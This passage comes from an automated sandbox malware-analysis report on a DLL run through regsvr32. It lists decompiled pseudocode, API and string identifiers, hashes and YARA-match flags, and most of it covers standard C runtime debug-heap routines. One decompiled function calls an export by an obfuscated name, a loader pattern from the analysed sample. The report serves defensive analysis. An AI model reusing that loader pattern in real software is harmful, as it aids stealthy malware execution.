                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _unlock
                                • String ID: Error: memory allocation: bad memory block type.
                                • API String ID: 2480363372-1537269110
                                • Opcode ID: 070c00f70d4df6f813f84e43e5590717d4ebcb6a3ae1d4e5f47ac26a0ae5b61c
                                • Instruction ID: 5caffd3b8bb6e9a751bf86ff06ba01468230100948e3856d22c691b184e429db
                                • Opcode Fuzzy Hash: 070c00f70d4df6f813f84e43e5590717d4ebcb6a3ae1d4e5f47ac26a0ae5b61c
                                • Instruction Fuzzy Hash: 6B71EB36A09B8586DBA0CB59E89036EB7E0F3C9B90F218526DADD437A4DF7DD044CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EncodePointer_initterm_e
                                • String ID: Y
                                • API String ID: 1618838664-1754117475
                                • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                • Instruction ID: e2eda9ea6841371ef03f52dec0317b7f8d7542193ab5d09d46fee122be74aa2a
                                • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                • Instruction Fuzzy Hash: 1DE0C22190C042A7FAA1AB24ED453BE63E0B791344FA14231E2CD824B5EB2FF908CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E000007FE7FEF9D23110(void* __eflags, long long* __rax) {
                                				void* _t7;
                                				intOrPtr _t8;
                                				void* _t10;
                                
                                				_t8 =  *0xf9d4c3c8; // 0x180000000
                                				E000007FE7FEF9D211E0(_t7, _t8, "H82WX82viYR", _t10); // executed
                                				 *__rax(); // executed
                                				return 0;
                                			}







                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ExitProcessUser
                                • String ID: H82WX82viYR
                                • API String ID: 3902816426-3887106525
                                • Opcode ID: 9520d05ee5257cfcb6870757d168f5deeb70c535bf89830e30f839e103e3a1eb
                                • Instruction ID: 3c31bc9bae0aa088b32ec31719daf081635377c5f01f1f7dd7abf53af6b9f495
                                • Opcode Fuzzy Hash: 9520d05ee5257cfcb6870757d168f5deeb70c535bf89830e30f839e103e3a1eb
                                • Instruction Fuzzy Hash: 0DC04C11F2550381EA4467E6AC861AC12A16785790FA19421D55C86231DE6E92964B02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 62%
                                			E000007FE7FEF9D27540(long long __rax) {
                                				long long _v24;
                                				void* _t8;
                                				void* _t9;
                                
                                				_t16 = __rax;
                                				_t9 = E000007FE7FEF9D23D00(_t8); // executed
                                				_v24 = __rax;
                                				return E000007FE7FEF9D2CF20(E000007FE7FEF9D2CFB0(E000007FE7FEF9D2D450(E000007FE7FEF9D2D470(E000007FE7FEF9D2BD50(E000007FE7FEF9D2AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
                                			}







                                APIs
                                  • Part of subcall function 000007FEF9D23D00: RtlEncodePointer.NTDLL ref: 000007FEF9D23D06
                                • _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                • _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                  • Part of subcall function 000007FEF9D2CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF9D2758A,?,?,?,?,?,?,000007FEF9D23D39), ref: 000007FEF9D2CF30
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                • String ID:
                                • API String ID: 2678799220-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ExitProcess$AllocateHeap__crt
                                • String ID:
                                • API String ID: 4215626177-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E000007FE7FEF9D24399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                
                                				_a48 = __rax;
                                				if (_a48 == 0) goto 0xf9d243ad;
                                				goto 0xf9d243f5;
                                				if (_a88 != 0) goto 0xf9d243ce;
                                				if (_a120 == 0) goto 0xf9d243c7;
                                				 *_a120 = 0xc;
                                				goto 0xf9d243f5;
                                				if (E000007FE7FEF9D2ABB0(_a48, _a80) != 0) goto 0xf9d243f3;
                                				if (_a120 == 0) goto 0xf9d243ef;
                                				 *_a120 = 0xc;
                                				goto 0xf9d243f5;
                                				goto 0xf9d24377;
                                				return 0;
                                			}




                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _ioterm
                                • String ID:
                                • API String ID: 4163092671-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _ioterm.LIBCMTD ref: 000007FEF9D23437
                                  • Part of subcall function 000007FEF9D27D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2343C), ref: 000007FEF9D27D93
                                  • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                  • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                  • Part of subcall function 000007FEF9D288D0: HeapDestroy.KERNELBASE ref: 000007FEF9D288DB
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                • String ID:
                                • API String ID: 1508997487-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DestroyHeap
                                • String ID:
                                • API String ID: 2435110975-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                • API String ID: 4197005980-4190456261
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                • API String ID: 2256938910-232180764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                • API String ID: 0-1181733849
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 000007FEF9D257E9
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D2579F
                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 000007FEF9D254F7, 000007FEF9D2556D, 000007FEF9D257FE
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2573C
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25683
                                • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 000007FEF9D2542B
                                • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 000007FEF9D25558
                                • _CrtIsValidHeapPointer(pUserData), xrefs: 000007FEF9D254E2
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25620
                                • Client hook free failure., xrefs: 000007FEF9D254A0
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapPointerValid_free_base
                                • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                • API String ID: 1656799702-182684663
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D26030
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                • _heapchk fails with _HEAPBADNODE., xrefs: 000007FEF9D25D19
                                • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 000007FEF9D260FA
                                • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                • DAMAGED, xrefs: 000007FEF9D25E7D
                                • _heapchk fails with _HEAPBADBEGIN., xrefs: 000007FEF9D25CE5
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25F42
                                • _heapchk fails with _HEAPBADPTR., xrefs: 000007FEF9D25D7E
                                • _heapchk fails with _HEAPBADEND., xrefs: 000007FEF9D25D4D
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                • _1, xrefs: 000007FEF9D261FC
                                • _heapchk fails with unknown return value!, xrefs: 000007FEF9D25DAF
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                • API String ID: 0-510578482
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E000007FE7FEF9D23280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
                                				void* _t7;
                                				void* _t10;
                                				signed long long _t15;
                                				signed long long* _t16;
                                				signed long long _t20;
                                				signed long long _t24;
                                
                                				_t7 = __rcx -  *0xf9d4b018; // 0x6ebd4e3f5ce4
                                				if (_t7 != 0) goto 0xf9d2329a;
                                				asm("dec eax");
                                				if ((__ecx & 0x0000ffff) != 0) goto 0xf9d23296;
                                				asm("repe ret");
                                				asm("dec eax");
                                				goto 0xf9d23720;
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("o16 nop [eax+eax]");
                                				if (__r8 - 8 < 0) goto 0xf9d2330c;
                                				_t20 = __rdx * 0x1010101;
                                				_t10 = __r8 - 0x40;
                                				if (_t10 < 0) goto 0xf9d232ee;
                                				_t15 =  ~__rcx;
                                				if (_t10 == 0) goto 0xf9d232de;
                                				 *__rcx = _t20;
                                				_t16 = _t15 + __rcx;
                                				if (_t10 != 0) goto 0xf9d23327;
                                				_t24 = __r8 - _t15 & 7;
                                				if (_t10 == 0) goto 0xf9d2330c;
                                				 *_t16 = _t20;
                                				if (_t10 != 0) goto 0xf9d23300;
                                				if (_t24 == 0) goto 0xf9d2331b;
                                				_t16[1] = __edx & 0x000000ff;
                                				if (_t24 - 1 != 0) goto 0xf9d23311;
                                				return __eax;
                                			}










                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                • String ID:
                                • API String ID: 3778485334-0
                                • Opcode ID: b9a945e82b5db3173e30537439e0c8a0a2586c91a17b1594fbe54d080f64dea2
                                • Instruction ID: 1cff5b4ce0ef1e4e3ef6199276dfa804718153c0ec8d85c09348b02a89a91835
                                • Opcode Fuzzy Hash: b9a945e82b5db3173e30537439e0c8a0a2586c91a17b1594fbe54d080f64dea2
                                • Instruction Fuzzy Hash: 0F31B435908B4685EAA09B69FD443AEB3E0F784794F608026DACD43775DF7EE0588B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !f3$/w 8$CZ&B$KE$XW]${H$~V$ehl
                                • API String ID: 0-603092622
                                • Opcode ID: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                • Instruction ID: cfa183faa2580dac9c87674e45a13d453ed6874265d0529349a04ca9f57a85af
                                • Opcode Fuzzy Hash: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                • Instruction Fuzzy Hash: 079206752047888BDBB8CF24D8897CE7BE1FB86354F10451DE94E8AA60DBB89744CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _unlock
                                • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                • API String ID: 2480363372-3680694803
                                • Opcode ID: 20c9d93c7bd8e5bb28edf4ede7e61cb74df2466a6d8b2339d4d317b1b63016a2
                                • Instruction ID: 043f5a1d32994ed4de3068b5f716ee40183123659e8364044ce03f87ba7bfcf6
                                • Opcode Fuzzy Hash: 20c9d93c7bd8e5bb28edf4ede7e61cb74df2466a6d8b2339d4d317b1b63016a2
                                • Instruction Fuzzy Hash: 6D510A31A096828AE7F48B68EC4576E73E4F395354F614135DADD83BB4DB3EE4448B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -~$!X$"98$5%dv$RXrB$}k=$t$t
                                • API String ID: 0-2601355769
                                • Opcode ID: 1ffe31184e489043dfc0ad9b25877cc2ca41a6506ccf0b542c306d1cb23fc7eb
                                • Instruction ID: 40fa059977533c12daa4c197ac7ec32be5dd4a9ad21ad0dd792eee812670dda9
                                • Opcode Fuzzy Hash: 1ffe31184e489043dfc0ad9b25877cc2ca41a6506ccf0b542c306d1cb23fc7eb
